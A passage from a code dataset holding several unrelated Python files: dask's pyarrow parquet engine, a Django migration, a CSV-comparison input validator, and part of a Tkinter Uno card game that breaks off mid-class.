file_row_groups[fpath].append(0)\n if gather_statistics:\n if single_rg_parts:\n s = {\n \"file_path_0\": fpath,\n \"num-rows\": row_group.num_rows,\n \"total_byte_size\": row_group.total_byte_size,\n \"columns\": [],\n }\n else:\n s = {\n \"num-rows\": row_group.num_rows,\n \"total_byte_size\": row_group.total_byte_size,\n }\n cstats = []\n for name, i in stat_col_indices.items():\n column = row_group.column(i)\n if column.statistics:\n cmin = column.statistics.min\n cmax = column.statistics.max\n cnull = column.statistics.null_count\n last = cmax_last.get(name, None)\n if no_filters:\n # Only think about bailing if we don't need\n # stats for filtering\n if cmin is None or (last and cmin < last):\n # We are collecting statistics for divisions\n # only (no filters) - Column isn't sorted, or\n # we have an all-null partition, so lets bail.\n #\n # Note: This assumes ascending order.\n #\n gather_statistics = False\n file_row_group_stats = {}\n file_row_group_column_stats = {}\n break\n\n if single_rg_parts:\n to_ts = column.statistics.logical_type.type == \"TIMESTAMP\"\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": cmin if not to_ts else pd.Timestamp(cmin),\n \"max\": cmax if not to_ts else pd.Timestamp(cmax),\n \"null_count\": cnull,\n }\n )\n else:\n cstats += [cmin, cmax, cnull]\n cmax_last[name] = cmax\n else:\n\n if no_filters and column.num_values > 0:\n # We are collecting statistics for divisions\n # only (no filters) - Lets bail.\n gather_statistics = False\n file_row_group_stats = {}\n file_row_group_column_stats = {}\n break\n\n if single_rg_parts:\n s[\"columns\"].append({\"name\": name})\n else:\n cstats += [None, None, None]\n if gather_statistics:\n file_row_group_stats[fpath].append(s)\n if not single_rg_parts:\n file_row_group_column_stats[fpath].append(tuple(cstats))\n\n return (\n file_row_groups,\n file_row_group_stats,\n file_row_group_column_stats,\n gather_statistics,\n )\n\n\ndef _construct_parts(\n fs,\n metadata,\n schema,\n filters,\n index_cols,\n data_path,\n partition_info,\n categories,\n split_row_groups,\n gather_statistics,\n):\n \"\"\"Construct ``parts`` for ddf construction\n\n Use metadata (along with other data) to define a tuple\n for each ddf partition. Also gather statistics if\n ``gather_statistics=True``, and other criteria is met.\n \"\"\"\n\n parts = []\n stats = []\n\n partition_keys = partition_info[\"partition_keys\"]\n partition_obj = partition_info[\"partitions\"]\n\n # Check if `metadata` is just a list of paths\n # (not splitting by row-group or collecting statistics)\n if isinstance(metadata, list) and isinstance(metadata[0], str):\n for full_path in metadata:\n part = {\n \"piece\": (full_path, None, partition_keys.get(full_path, None)),\n \"kwargs\": {\"partitions\": partition_obj, \"categories\": categories},\n }\n parts.append(part)\n return parts, stats\n\n # Determine which columns need statistics\n flat_filters = (\n set(flatten(tuple(flatten(filters, container=list)), container=tuple))\n if filters\n else []\n )\n stat_col_indices = {}\n for i, name in enumerate(schema.names):\n if name in index_cols or name in flat_filters:\n stat_col_indices[name] = i\n stat_cols = list(stat_col_indices.keys())\n gather_statistics = gather_statistics and len(stat_cols) > 0\n\n # Convert metadata into simple dictionary structures\n (\n file_row_groups,\n file_row_group_stats,\n file_row_group_column_stats,\n gather_statistics,\n ) = _process_metadata(\n metadata,\n int(split_row_groups) == 1,\n gather_statistics,\n stat_col_indices,\n flat_filters == [],\n )\n\n if split_row_groups:\n # Create parts from each file,\n # limiting the number of row_groups in each piece\n split_row_groups = int(split_row_groups)\n for filename, row_groups in file_row_groups.items():\n row_group_count = len(row_groups)\n for i in range(0, row_group_count, split_row_groups):\n i_end = i + split_row_groups\n rg_list = row_groups[i:i_end]\n full_path = (\n fs.sep.join([data_path, filename])\n if filename != \"\"\n else data_path # This is a single file\n )\n pkeys = partition_keys.get(full_path, None)\n if partition_obj and pkeys is None:\n continue # This partition was filtered\n part = {\n \"piece\": (full_path, rg_list, pkeys),\n \"kwargs\": {\n \"partitions\": partition_obj,\n \"categories\": categories,\n \"filters\": filters,\n \"schema\": schema,\n },\n }\n parts.append(part)\n if gather_statistics:\n stat = _aggregate_stats(\n filename,\n file_row_group_stats[filename][i:i_end],\n file_row_group_column_stats[filename][i:i_end],\n stat_col_indices,\n )\n stats.append(stat)\n else:\n for filename, row_groups in file_row_groups.items():\n full_path = (\n fs.sep.join([data_path, filename])\n if filename != \"\"\n else data_path # This is a single file\n )\n pkeys = partition_keys.get(full_path, None)\n if partition_obj and pkeys is None:\n continue # This partition was filtered\n rgs = None\n part = {\n \"piece\": (full_path, rgs, pkeys),\n \"kwargs\": {\n \"partitions\": partition_obj,\n \"categories\": categories,\n \"filters\": filters,\n \"schema\": schema,\n },\n }\n parts.append(part)\n if gather_statistics:\n stat = _aggregate_stats(\n filename,\n file_row_group_stats[filename],\n file_row_group_column_stats[filename],\n stat_col_indices,\n )\n stats.append(stat)\n\n return parts, stats\n\n\nclass ArrowEngine(Engine):\n @classmethod\n def read_metadata(\n cls,\n fs,\n paths,\n categories=None,\n index=None,\n gather_statistics=None,\n filters=None,\n split_row_groups=None,\n **kwargs,\n ):\n\n # Check if we are using pyarrow.dataset API\n dataset_kwargs = kwargs.get(\"dataset\", {})\n\n # Gather necessary metadata information. This includes\n # the schema and (parquet) partitioning information.\n # This may also set split_row_groups and gather_statistics,\n # depending on _metadata availability.\n (\n schema,\n metadata,\n base_path,\n partition_info,\n split_row_groups,\n gather_statistics,\n ) = _gather_metadata(\n paths, fs, split_row_groups, gather_statistics, filters, dataset_kwargs\n )\n\n # Process metadata to define `meta` and `index_cols`\n meta, index_cols, categories, index = _generate_dd_meta(\n schema, index, categories, partition_info\n )\n\n # Cannot gather_statistics if our `metadata` is a list\n # of paths, or if we are building a multiindex (for now).\n # We also don't \"need\" to gather statistics if we don't\n # want to apply any filters or calculate divisions\n if (isinstance(metadata, list) and isinstance(metadata[0], str)) or len(\n index_cols\n ) > 1:\n gather_statistics = False\n elif filters is None and len(index_cols) == 0:\n gather_statistics = False\n\n # Make sure gather_statistics allows filtering\n # (if filters are desired)\n if filters:\n # Filters may require us to gather statistics\n if gather_statistics is False and partition_info[\"partition_names\"]:\n warnings.warn(\n \"Filtering with gather_statistics=False. \"\n \"Only partition columns will be filtered correctly.\"\n )\n elif gather_statistics is False:\n raise ValueError(\"Cannot apply filters with gather_statistics=False\")\n elif not gather_statistics:\n gather_statistics = True\n\n # Finally, construct our list of `parts`\n # (and a corresponing list of statistics)\n parts, stats = _construct_parts(\n fs,\n metadata,\n schema,\n filters,\n index_cols,\n base_path,\n partition_info,\n categories,\n split_row_groups,\n gather_statistics,\n )\n\n return (meta, stats, parts, index)\n\n @classmethod\n def read_partition(\n cls,\n fs,\n piece,\n columns,\n index,\n categories=(),\n partitions=(),\n filters=None,\n schema=None,\n **kwargs,\n ):\n if isinstance(index, list):\n for level in index:\n # unclear if we can use set ops here. I think the order matters.\n # Need the membership test to avoid duplicating index when\n # we slice with `columns` later on.\n if level not in columns:\n columns.append(level)\n\n # Ensure `columns` and `partitions` do not overlap\n columns_and_parts = columns.copy()\n if columns_and_parts and partitions:\n for part_name in partitions.partition_names:\n if part_name in columns:\n columns.remove(part_name)\n else:\n columns_and_parts.append(part_name)\n columns = columns or None\n\n if isinstance(piece, str):\n # `piece` is a file-path string\n path = piece\n row_group = None\n partition_keys = None\n else:\n # `piece` contains (path, row_group, partition_keys)\n (path, row_group, partition_keys) = piece\n\n if not isinstance(row_group, list):\n row_group = [row_group]\n\n dfs = []\n for rg in row_group:\n piece = pq.ParquetDatasetPiece(\n path,\n row_group=rg,\n partition_keys=partition_keys,\n open_file_func=partial(fs.open, mode=\"rb\"),\n )\n arrow_table = cls._parquet_piece_as_arrow(\n piece, columns, partitions, **kwargs\n )\n df = cls._arrow_table_to_pandas(arrow_table, categories, **kwargs)\n\n if len(row_group) > 1:\n dfs.append(df)\n\n if len(row_group) > 1:\n df = pd.concat(dfs)\n\n # Note that `to_pandas(ignore_metadata=False)` means\n # pyarrow will use the pandas metadata to set the index.\n index_in_columns_and_parts = set(df.index.names).issubset(\n set(columns_and_parts)\n )\n if not index:\n if index_in_columns_and_parts:\n # User does not want to set index and a desired\n # column/partition has been set to the index\n df.reset_index(drop=False, inplace=True)\n else:\n # User does not want to set index and an\n # \"unwanted\" column has been set to the index\n df.reset_index(drop=True, inplace=True)\n else:\n if set(df.index.names) != set(index) and index_in_columns_and_parts:\n # The wrong index has been set and it contains\n # one or more desired columns/partitions\n df.reset_index(drop=False, inplace=True)\n elif index_in_columns_and_parts:\n # The correct index has already been set\n index = False\n columns_and_parts = list(\n set(columns_and_parts).difference(set(df.index.names))\n )\n df = df[list(columns_and_parts)]\n\n if index:\n df = df.set_index(index)\n return df\n\n @classmethod\n def _arrow_table_to_pandas(\n cls, arrow_table: pa.Table, categories, **kwargs\n ) -> pd.DataFrame:\n _kwargs = kwargs.get(\"arrow_to_pandas\", {})\n _kwargs.update({\"use_threads\": False, \"ignore_metadata\": False})\n\n return arrow_table.to_pandas(categories=categories, **_kwargs)\n\n @classmethod\n def _parquet_piece_as_arrow(\n cls, piece: pq.ParquetDatasetPiece, columns, partitions, **kwargs\n ) -> pa.Table:\n arrow_table = piece.read(\n columns=columns,\n partitions=partitions,\n use_pandas_metadata=True,\n use_threads=False,\n **kwargs.get(\"read\", {}),\n )\n return arrow_table\n\n @staticmethod\n def initialize_write(\n df,\n fs,\n path,\n append=False,\n partition_on=None,\n ignore_divisions=False,\n division_info=None,\n schema=None,\n index_cols=None,\n **kwargs,\n ):\n # Infer schema if \"infer\"\n # (also start with inferred schema if user passes a dict)\n if schema == \"infer\" or isinstance(schema, dict):\n\n # Start with schema from _meta_nonempty\n _schema = pa.Schema.from_pandas(\n df._meta_nonempty.set_index(index_cols)\n if index_cols\n else df._meta_nonempty\n )\n\n # Use dict to update our inferred schema\n if isinstance(schema, dict):\n schema = pa.schema(schema)\n for name in schema.names:\n i = _schema.get_field_index(name)\n j = schema.get_field_index(name)\n _schema = _schema.set(i, schema.field(j))\n\n # If we have object columns, we need to sample partitions\n # until we find non-null data for each column in `sample`\n sample = [col for col in df.columns if df[col].dtype == \"object\"]\n if schema_field_supported and sample and schema == \"infer\":\n delayed_schema_from_pandas = delayed(pa.Schema.from_pandas)\n for i in range(df.npartitions):\n # Keep data on worker\n _s = delayed_schema_from_pandas(\n df[sample].to_delayed()[i]\n ).compute()\n for name, typ in zip(_s.names, _s.types):\n if typ != \"null\":\n i = _schema.get_field_index(name)\n j = _s.get_field_index(name)\n _schema = _schema.set(i, _s.field(j))\n sample.remove(name)\n if not sample:\n break\n\n # Final (inferred) schema\n schema = _schema\n\n dataset = fmd = None\n i_offset = 0\n if append and division_info is None:\n ignore_divisions = True\n fs.mkdirs(path, exist_ok=True)\n\n if append:\n try:\n # Allow append if the dataset exists.\n # Also need dataset.metadata object if\n # ignore_divisions is False (to check divisions)\n dataset = pq.ParquetDataset(path, filesystem=fs)\n if not dataset.metadata and not ignore_divisions:\n # TODO: Be more flexible about existing metadata.\n raise NotImplementedError(\n \"_metadata file needed to `append` \"\n \"with `engine='pyarrow'` \"\n \"unless `ignore_divisions` is `True`\"\n )\n fmd = dataset.metadata\n except (IOError, ValueError, IndexError):\n # Original dataset does not exist - cannot append\n append = False\n if append:\n names = dataset.metadata.schema.names\n has_pandas_metadata = (\n dataset.schema.to_arrow_schema().metadata is not None\n and b\"pandas\" in dataset.schema.to_arrow_schema().metadata\n )\n if has_pandas_metadata:\n pandas_metadata = json.loads(\n dataset.schema.to_arrow_schema().metadata[b\"pandas\"].decode(\"utf8\")\n )\n categories = [\n c[\"name\"]\n for c in pandas_metadata[\"columns\"]\n if c[\"pandas_type\"] == \"categorical\"\n ]\n else:\n categories = None\n dtypes = _get_pyarrow_dtypes(dataset.schema.to_arrow_schema(), categories)\n if set(names) != set(df.columns) - set(partition_on):\n raise ValueError(\n \"Appended columns not the same.\\n\"\n \"Previous: {} | New: {}\".format(names, list(df.columns))\n )\n elif (pd.Series(dtypes).loc[names] != df[names].dtypes).any():\n # TODO Coerce values for compatible but different dtypes\n raise ValueError(\n \"Appended dtypes differ.\\n{}\".format(\n set(dtypes.items()) ^ set(df.dtypes.iteritems())\n )\n )\n i_offset = len(dataset.pieces)\n\n if division_info[\"name\"] not in names:\n ignore_divisions = True\n if not ignore_divisions:\n old_end = None\n row_groups = [\n dataset.metadata.row_group(i)\n for i in range(dataset.metadata.num_row_groups)\n ]\n for row_group in row_groups:\n for i, name in enumerate(names):\n if name != division_info[\"name\"]:\n continue\n column = row_group.column(i)\n if column.statistics:\n if not old_end:\n old_end = column.statistics.max\n else:\n old_end = max(old_end, column.statistics.max)\n break\n\n divisions = division_info[\"divisions\"]\n if divisions[0] < old_end:\n raise ValueError(\n \"Appended divisions overlapping with the previous ones\"\n \" (set ignore_divisions=True to append anyway).\\n\"\n \"Previous: {} | New: {}\".format(old_end, divisions[0])\n )\n\n return fmd, schema, i_offset\n\n @staticmethod\n def write_partition(\n df,\n path,\n fs,\n filename,\n partition_on,\n return_metadata,\n fmd=None,\n compression=None,\n index_cols=None,\n schema=None,\n **kwargs,\n ):\n _meta = None\n preserve_index = False\n if _index_in_schema(index_cols, schema):\n df.set_index(index_cols, inplace=True)\n preserve_index = True\n else:\n index_cols = []\n t = pa.Table.from_pandas(df, preserve_index=preserve_index, schema=schema)\n if partition_on:\n md_list = _write_partitioned(\n t,\n path,\n filename,\n partition_on,\n fs,\n index_cols=index_cols,\n compression=compression,\n **kwargs,\n )\n if md_list:\n _meta = md_list[0]\n for i in range(1, len(md_list)):\n _append_row_groups(_meta, md_list[i])\n else:\n md_list = []\n with fs.open(fs.sep.join([path, filename]), \"wb\") as fil:\n pq.write_table(\n t,\n fil,\n compression=compression,\n metadata_collector=md_list,\n **kwargs,\n )\n if md_list:\n _meta = md_list[0]\n _meta.set_file_path(filename)\n # Return the schema needed to write the metadata\n if return_metadata:\n return [{\"schema\": t.schema, \"meta\": _meta}]\n else:\n return []\n\n @staticmethod\n def write_metadata(parts, fmd, fs, path, append=False, **kwargs):\n if parts:\n if not append:\n # Get only arguments specified in the function\n common_metadata_path = fs.sep.join([path, \"_common_metadata\"])\n keywords = getargspec(pq.write_metadata).args\n kwargs_meta = {k: v for k, v in kwargs.items() if k in keywords}\n with fs.open(common_metadata_path, \"wb\") as fil:\n pq.write_metadata(parts[0][0][\"schema\"], fil, **kwargs_meta)\n\n # Aggregate metadata and write to _metadata file\n metadata_path = fs.sep.join([path, \"_metadata\"])\n if append and fmd is not None:\n _meta = fmd\n i_start = 0\n else:\n _meta = parts[0][0][\"meta\"]\n i_start = 1\n for i in range(i_start, len(parts)):\n _append_row_groups(_meta, parts[i][0][\"meta\"])\n with fs.open(metadata_path, \"wb\") as fil:\n _meta.write_metadata_file(fil)\n","sub_path":"dask/dataframe/io/parquet/arrow.py","file_name":"arrow.py","file_ext":"py","file_size_in_byte":38459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"454977448","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('loginapp', '0024_auto_20150603_1700'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='photo',\n field=models.FileField(blank=True, upload_to='photos/%Y/%m/%d', null=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='date_joined',\n field=models.DateTimeField(verbose_name='date joined', default=datetime.datetime(2015, 6, 3, 18, 45, 16, 636876, tzinfo=utc)),\n ),\n ]\n","sub_path":"backend/swapstersio/loginapp/migrations/0025_auto_20150603_1845.py","file_name":"0025_auto_20150603_1845.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"229261346","text":"from csv_comparison_package.error_handler import AppErrorHandler\nfrom csv_comparison_package.field import Field\n\n\ndef check_for_empty_value(comparator):\n \"\"\" Check for parameters that can not have empty value\"\"\"\n for key_val in comparator.default_schema:\n is_key_available = all([key_val[Field.prm_required.value],\n key_val[Field.prm_name.value] in comparator.parameters,\n key_val[Field.prm_default_value.value] is None])\n\n if is_key_available:\n is_value_blank = comparator.parameters[key_val[Field.prm_name.value]] == \\\n Field.empty_string.value\n if is_value_blank:\n raise AppErrorHandler(AppErrorHandler.invalid_value)\n","sub_path":"csv_comparison_package/input_validator/__check_for_empty_value.py","file_name":"__check_for_empty_value.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"78992650","text":"from tkinter import *\r\nfrom random import choice\r\nfrom PIL import Image, ImageTk\r\n\r\ncol = \"lightgoldenrodyellow\"\r\n\r\nroot = Tk()\r\nroot.geometry(\"1500x750\")\r\nroot.resizable(False, False)\r\nroot.wm_attributes('-transparentcolor', \"orange\")\r\nroot.configure(bg=col)\r\nroot.title(\"Uno 2.0\")\r\n\r\nfolder = \"Revamped Uno_Assets\"\r\n\r\nimages = {\r\n \"Red\": ImageTk.PhotoImage(Image.open(f\"{folder}/Red.png\").convert(\"RGBA\").rotate(45)),\r\n \"Green\": ImageTk.PhotoImage(Image.open(f\"{folder}/Green.png\").convert(\"RGBA\").rotate(45)),\r\n \"Yellow\": ImageTk.PhotoImage(Image.open(f\"{folder}/Yellow.png\").convert(\"RGBA\").rotate(45)),\r\n \"Blue\": ImageTk.PhotoImage(Image.open(f\"{folder}/Blue.png\").convert(\"RGBA\").rotate(45)),\r\n \"Deck\": ImageTk.PhotoImage(file=f\"{folder}/Deck.png\"), # Deck image (for drawing cards)\r\n \"UNO\": ImageTk.PhotoImage(file=f\"{folder}/Logo.png\"), # big sign\r\n \"UNO_Button\": ImageTk.PhotoImage(file=f\"{folder}/UnoButton.png\"),\r\n \"Start\": ImageTk.PhotoImage(file=f\"{folder}/startButton.png\")\r\n }\r\n\r\nbgCols = {\r\n \"Red\": \"#802019\",\r\n \"Purple\": \"#48406A\",\r\n \"Green\": \"#23863F\",\r\n \"Blue\": \"#40686A\"\r\n }\r\n\r\n\r\nmainBg = bgCols[\"Purple\"]\r\n# #1-#9: 2, Specials: 2, Wilds: 4, #0: 1\r\ncards = [\"Wild\", \"Wild_Draw\", \"Skip\", \"Draw\", \"Reverse\"] + [str(n) for n in range(10)]\r\n\r\ncanvas = Canvas(root, width=1126, height=700, bg=mainBg)\r\ncanvas.place(relx=0.225,rely=0.5, anchor=\"w\")\r\n \r\ncolourPicker = {\"Red\": canvas.create_image(int(canvas[\"width\"])/2+250, int(canvas[\"height\"])/2-100,image=images[\"Red\"], state=\"hidden\"),\r\n \"Yellow\": canvas.create_image(int(canvas[\"width\"])/2+180, int(canvas[\"height\"])/2-30,image=images[\"Yellow\"], state=\"hidden\"), # 181, -30\r\n \"Blue\": canvas.create_image(int(canvas[\"width\"])/2+320, int(canvas[\"height\"])/2-30,image=images[\"Blue\"], state=\"hidden\"), # 322, -31\r\n \"Green\": canvas.create_image(int(canvas[\"width\"])/2+250, int(canvas[\"height\"])/2+40,image=images[\"Green\"], state=\"hidden\") # 251, 39\r\n }\r\n\r\nclass Card():\r\n def __init__(self, name, displayName, colour, cardType, worth): \r\n self.name = name\r\n self.colour = colour\r\n self.cardType = cardType\r\n self.worth = worth\r\n self.animating = True\r\n self.up = False\r\n self.displayName = displayName\r\n self.time = 100\r\n #print(name, colour, cardType)\r\n self.rawImage = Image.open(f\"{folder}/{name}.png\").convert(\"RGBA\")\r\n self.backRaw = Image.open(f\"{folder}/Back.png\").convert(\"RGBA\")\r\n self.storedImage = ImageTk.PhotoImage(self.rawImage)\r\n # Height and width don't matter for a label without text (input is overriden, regardless of value)\r\n #self.main = Label(canvas, image=self.storedImage, bg=mainBg)\r\n self.main = canvas.create_image(int(canvas[\"width\"])/2+self.storedImage.width(), int(canvas[\"height\"])/2, image=self.storedImage, state=\"hidden\")\r\n\r\n def disable(self):\r\n canvas.tag_unbind(self.main, \"<1>\")\r\n \r\n def RightToCentre(self): # Placed on right of canvas, rotated 90* to face center.\r\n #self.main[\"image\"] = images[\"R_Back\"]\r\n #self.main.unbind(\"<1>\")\r\n self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(90, expand=True))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def LeftToCentre(self): # Placed on left of canvas, rotated 90* to face center\r\n self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(-90, expand=True))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def Reverse(self): # Placed on top of convas, rotated 180* to face center\r\n self.backImage = ImageTk.PhotoImage(self.backRaw.rotate(180))\r\n canvas.itemconfig(self.main, image=self.backImage)\r\n self.disable()\r\n\r\n def Normal(self): # Placed on bottom of canvas. Normal card image\r\n canvas.itemconfig(self.main, image=self.storedImage)\r\n canvas.tag_bind(self.main, \"<1>\", self.attemptCardUsage)\r\n\r\n def animateUp(self):\r\n if self.animating: return\r\n self.animating = True\r\n base = canvas.coords(self.main)\r\n animateWidgetMovement(self.main, base[0], base[1]-self.storedImage.height()/2, self.time)\r\n root.after(self.time, self.toggleUp, True)\r\n\r\n def animateDown(self):\r\n if self.animating: return\r\n self.animating = True\r\n base = canvas.coords(self.main)\r\n animateWidgetMovement(self.main, base[0], base[1]+self.storedImage.height()/2, self.time)\r\n root.after(self.time, self.toggleUp, False)\r\n\r\n def toggleUp(self, val):\r\n self.up = val\r\n self.animating = False\r\n \r\n \r\n def isUsable(self):\r\n if not game.started:\r\n game.log.output(\"Game has not started yet!\")\r\n return False\r\n elif self.name.find(\"Wild\") > -1 or self.colour == game.deck.lastCardUsed.colour or self.cardType == game.deck.lastCardUsed.cardType:\r\n return True\r\n \r\n def attemptCardUsage(self, event):\r\n if self.isUsable() and game.turnNumber == 0 and not game.pickingColour:\r\n self.use(game.user)\r\n\r\n def use(self, player):\r\n game.log.output(f\"{player.name} played {self.displayName}\")\r\n # Remove card from holder's hand\r\n for i, cardObj in enumerate(player.hand):\r\n if cardObj == self:\r\n player.hand.pop(i)\r\n player.visualiseHand(len(player.hand))\r\n break\r\n game.deck.updateLastUsed(self)\r\n if len(player.hand) == 1 :\r\n if game.uno: # Shout Uno\r\n game.log.output(f\"{player.name}: UNO!\")\r\n else: #Failed to say uno, punish player\r\n game.log.output(f\"{player.name} failed to say UNO! Drawing 2 cards as punishment.\")\r\n player.draw(2)\r\n incrementTurn = True\r\n if self.cardType == \"Reverse\":\r\n if game.playerCount == 2: # Functions as skip\r\n game.skipNext = True\r\n else: # Else reverse order\r\n game.increment *= -1\r\n elif self.cardType == \"Skip\":\r\n game.skipNext = True\r\n elif self.cardType == \"Draw\":\r\n game.skipNext = True # Skip next Turn\r\n # Force next to draw cards before skipping\r\n game.turnList[game.simplifyTurnNumber(False, game.increment)].draw(2)\r\n elif self.cardType == \"Wild\":\r\n if self.name == \"Wild_Draw\": # Wild draw 4, check legality\r\n legal = True\r\n for cardObj in player.hand:\r\n if cardObj.colour == game.deck.usedPile[-1].colour and cardObj.cardType != \"Wild\": # Illegal!!\r\n legal = False\r\n break\r\n if legal:\r\n game.skipNext = True # Skip next\r\n # Force next to draw cards before skipping \r\n game.turnList[game.simplifyTurnNumber(False, game.increment)].draw(4)\r\n else: # Not legal, punish user\r\n game.log.output(\"Illegal Wild Draw 4 played. User will draw 4 cards as punishment\")\r\n player.draw(4)\r\n if player == game.user and len(player.hand) > 0:\r\n game.pickingColour = True\r\n toggleColourPicker(\"normal\")\r\n incrementTurn = False\r\n\r\n if len(player.hand) == 0: # game over\r\n # Tally points and display winner\r\n totalScore = 0\r\n for plr in game.players:\r\n for cardObj in plr.hand:\r\n totalScore += cardObj.worth\r\n # Return card to deck and hide\r\n game.deck.cards.append(cardObj)\r\n plr.hand = []\r\n game.log.output(f\"{player.name} won, scoring {totalScore} points!\")\r\n if player == game.user:\r\n game.log.output(\"Congratulations!\")\r\n else:\r\n game.log.output(\"Better luck next time!\")\r\n \r\n # Return discard pile to deck\r\n game.deck.cards += game.deck.usedPile\r\n game.deck.usedPile = []\r\n game.deck.cards.append(game.deck.lastCardUsed)\r\n game.deck.lastCardUsed = None\r\n # Hide all cards in deck\r\n for cardObj in game.deck.cards:\r\n canvas.itemconfig(cardObj.main, state=\"hidden\")\r\n canvas.coords(cardObj.main,int(canvas[\"width\"])/2+self.storedImage.width(), int(canvas[\"height\"])/2) \r\n\r\n # Hide deck\r\n game.deck.main.place_forget()\r\n \r\n # Hide uno button\r\n canvas.itemconfig(game.unoButton, state=\"hidden\")\r\n \r\n # Show title screen\r\n game.displayTitleScreen(True)\r\n \r\n elif incrementTurn: # next turn\r\n game.incTurn()\r\n\r\n\r\nclass Deck():\r\n def __init__(self):\r\n self.cards = []\r\n self.usedPile = []\r\n self.lastCardUsed = None\r\n # Add cards of each colour\r\n for colour in [\"Yellow\", \"Red\", \"Green\", \"Blue\"]:\r\n # Add cards of each type\r\n for cardType in cards:\r\n name = f\"{colour}_{cardType}\"\r\n displayName = f\"{colour} {cardType}\"\r\n times = 1\r\n if len(cardType) == 1: # Number card\r\n worth = int(cardType)\r\n if cardType != \"0\": #1-9 number card. Make twice.\r\n times = 2\r\n elif cardType.find(\"Wild\") > -1: # Wild card. Make once (total 4).\r\n worth = 50\r\n name = cardType\r\n cardType = \"Wild\"\r\n if name == \"Wild_Draw\":\r\n displayName = \"Wild Draw 4\"\r\n else:\r\n displayName = \"Wild Card\"\r\n else: # Special card. Make twice.\r\n worth = 20\r\n times = 2\r\n self.cards.append(Card(name, displayName, colour, cardType, worth))\r\n if times == 2:\r\n self.cards.append(Card(name, displayName, colour, cardType, worth))\r\n\r\n self.cardHeight = self.cards[0].storedImage.height() + 2\r\n self.cardWidth = self.cards[0].storedImage.width() + 2\r\n self.main = Label(canvas, image=images[\"Deck\"], bg=mainBg)\r\n self.main.bind(\"<1>\", self.drawAttempted)\r\n\r\n def shuffle(self):\r\n try:\r\n from random import shuffle\r\n shuffle(self.cards)\r\n game.log.output(f\"Deck successfully shuffled! {len(self.cards)} cards remaining!\")\r\n except Exception as e:\r\n game.log.output(f\"Failed to shuffle deck:\\n\\n {e}\", error=True)\r\n\r\n def drawAttempted(self, event):\r\n if game.turnNumber == 0 and game.started: # Only let them draw if it's their turn \r\n game.user.draw()\r\n if not game.user.hand[-1].isUsable(): # can't use card, so end turn\r\n game.incTurn()\r\n\r\n def createUsedPile(self):\r\n #self.usedPileLabel.place(relx=0.5, rely=0.5,anchor=\"e\")\r\n self.lastCardUsed = game.deck.cards[0]\r\n # animate showing card \"discard\"\r\n finalX = int(canvas[\"width\"])/2 - self.cardWidth//1.5\r\n time = 200\r\n animateWidgetMovement(self.lastCardUsed.main, finalX, int(canvas[\"height\"])/2, time)\r\n root.after(int(time), self.checkUsedPile, time)\r\n\r\n def checkUsedPile(self, time):\r\n if self.lastCardUsed.name == \"Wild_Draw\":\r\n # Wild Draw 4 = Reshuffle + new discard\r\n game.log.output(\"Wild Draw 4 was first in the discard pile. Reshuffling to pick a new card!\")\r\n finalX = int(canvas[\"width\"])/2 + self.cardWidth\r\n animateWidgetMovement(self.lastCardUsed.main, finalX, int(canvas[\"height\"])/2, time/3*2)\r\n self.shuffle()\r\n root.after(int(time/3*2), self.createUsedPile)\r\n else:\r\n del self.cards[0]\r\n if self.lastCardUsed.name == \"Wild\":\r\n game.pickingColour = True\r\n toggleColourPicker(\"normal\")\r\n else:\r\n game.started = True\r\n for cardObj in game.user.hand:\r\n cardObj.animating = False\r\n \r\n if self.lastCardUsed.name == \"Skip\": # Skip player 1's turn\r\n game.turnNumber = 1\r\n game.log.output(f\"{game.user.name} had their turn skipped\")\r\n elif self.lastCardUsed.name == \"Draw\": # Player 1 draws 2 and loses turn\r\n game.user.draw(2)\r\n game.log.output(f\"{game.user.name} had their turn skipped\")\r\n game.turnNumber = 1\r\n elif self.lastCardUsed.name == \"Reverse\": # Reverse order and skip player's turn\r\n game.log.output(\"Direction of play reversed!\")\r\n game.turnNumber = game.playerCount-1\r\n game.increment = -1\r\n \r\n\r\n def updateLastUsed(self, card):\r\n self.usedPile.append(self.lastCardUsed)\r\n # Hide prior last card\r\n root.after(250, canvas.coords, self.lastCardUsed.main, -1*self.cardWidth, -1*self.cardHeight)\r\n # Update and show new last card\r\n self.lastCardUsed = card\r\n card.animating = True\r\n animateWidgetMovement(card.main, int(canvas[\"width\"])/2 - self.cardWidth//1.5, int(canvas[\"height\"])/2, 250)\r\n canvas.itemconfig(card.main, image=card.storedImage)\r\n\r\n def remakeDeck(self): # Shuffle used pile into deck\r\n self.cards = self.usedPile\r\n self.usedPile = []\r\n self.shuffle()\r\n # Place cards under deck\r\n for cardObj in self.cards:\r\n canvas.coords(cardObj.main, int(canvas[\"width\"])/2+self.cardWidth, int(canvas[\"height\"])/2)\r\n \r\nclass Player(): # User & Computers\r\n def __init__(self, name, playerNumber, colour): \r\n self.name = name\r\n self.hand = []\r\n self.num = playerNumber\r\n self.colour = colour\r\n self.turn = self.num == 1 # True if player, false if computer\r\n game.log.main.tag_configure(f\"PlayerNum{self.num}\", foreground=self.colour)\r\n # Set up main anchor positions for cards in hand\r\n height = game.deck.cardHeight\r\n width = game.deck.cardWidth\r\n if self.num == 1: # Bottom\r\n self.xVal = int(canvas[\"width\"])/2 + width/2 # relx = 0.5\r\n self.yVal = int(canvas[\"height\"]) - height/2 - 10\r\n elif self.num == 2: # Top\r\n self.xVal = int(canvas[\"width\"])/2 + width/2 # relx = 0.5\r\n self.yVal = 10 + height/2\r\n elif self.num == 4: # Left\r\n self.xVal = 10 + height/2\r\n self.yVal = int(canvas[\"height\"])/2 + width/2 # rely = 0.5\r\n else: # Right\r\n # subtract height because cards are \"rotated\"\r\n self.xVal = int(canvas[\"width\"])- height/2 - 10 